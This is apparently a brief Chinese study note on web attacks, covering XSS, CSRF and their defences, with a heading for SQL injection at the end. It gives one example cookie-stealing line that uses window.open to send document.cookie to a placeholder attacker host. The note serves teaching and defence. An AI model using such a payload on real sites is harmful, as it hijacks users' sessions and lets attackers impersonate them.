1.xss 跨站脚本攻击(反射型,存储型)
伪造会话(基于xss实现csrf)
劫持cookie:
window.open("http://www.xxx.com/record?secret=" + document.cookie)
自动将他们的cookie信息发送到攻击者的服务器,攻击者可以在cookie有效期内拿他们冒充用户操作。
恶意代码执行
防御:
输入过滤。cookie设置http-only(这样脚本无法获取cookie)。
2.csrf 跨站请求伪造
伪造用户身份操作
防御:
验证http referer字段(不严谨,因为可以篡改)
在请求地址中添加token验证(比如在post中,已参数形式加入随机产生的token)
csrf的前提是cookie验证用户身份
ajax无法带cookie验证
ajax受浏览器的同源策略限制,ajax默认无法请求跨域的接口(当然后台可以设置access-control-allow-origin:* 之类的允许跨域请求),ajax请求无法携带跨域cookie
3.sql注入